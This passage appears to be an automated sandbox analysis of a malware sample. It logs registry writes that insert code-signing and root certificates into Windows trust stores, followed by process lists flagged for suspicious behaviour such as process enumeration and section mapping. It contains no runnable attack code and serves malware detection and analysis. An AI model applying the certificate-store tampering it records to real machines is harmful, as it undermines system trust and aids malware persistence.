130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 1900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

POWERPNT.EXEWINWORD.EXE

pid process

7032 POWERPNT.EXE
5380 WINWORD.EXE

pid	process
7032	POWERPNT.EXE
5380	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeWerFault.exeMon178e7a516181.exe

pid	process
1560	powershell.exe
1560	powershell.exe
1540	powershell.exe
1540	powershell.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
4376	WerFault.exe
3176	Mon178e7a516181.exe
3176	Mon178e7a516181.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

Explorer.EXEfoldershare.exe

pid process

3196 Explorer.EXE
2244 foldershare.exe

Suspicious behavior: MapViewOfSection 13 IoCs

Processes:

adF6KxjhcOfjYh4ost48IawU.exeE_OHOPUQK1p49G7oDJQPE6PW.exeyOj1WECF7HJNMLcwMO9spdy6.exemsiexec.exe6F64.exe

pid	process
6064	adF6KxjhcOfjYh4ost48IawU.exe
6140	E_OHOPUQK1p49G7oDJQPE6PW.exe
6064	adF6KxjhcOfjYh4ost48IawU.exe
6064	adF6KxjhcOfjYh4ost48IawU.exe
6140	E_OHOPUQK1p49G7oDJQPE6PW.exe
6424	yOj1WECF7HJNMLcwMO9spdy6.exe
6140	E_OHOPUQK1p49G7oDJQPE6PW.exe
6140	E_OHOPUQK1p49G7oDJQPE6PW.exe
1756	msiexec.exe
1756	msiexec.exe
6704	6F64.exe
1756	msiexec.exe
1756	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

msedge.exe

pid	process
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
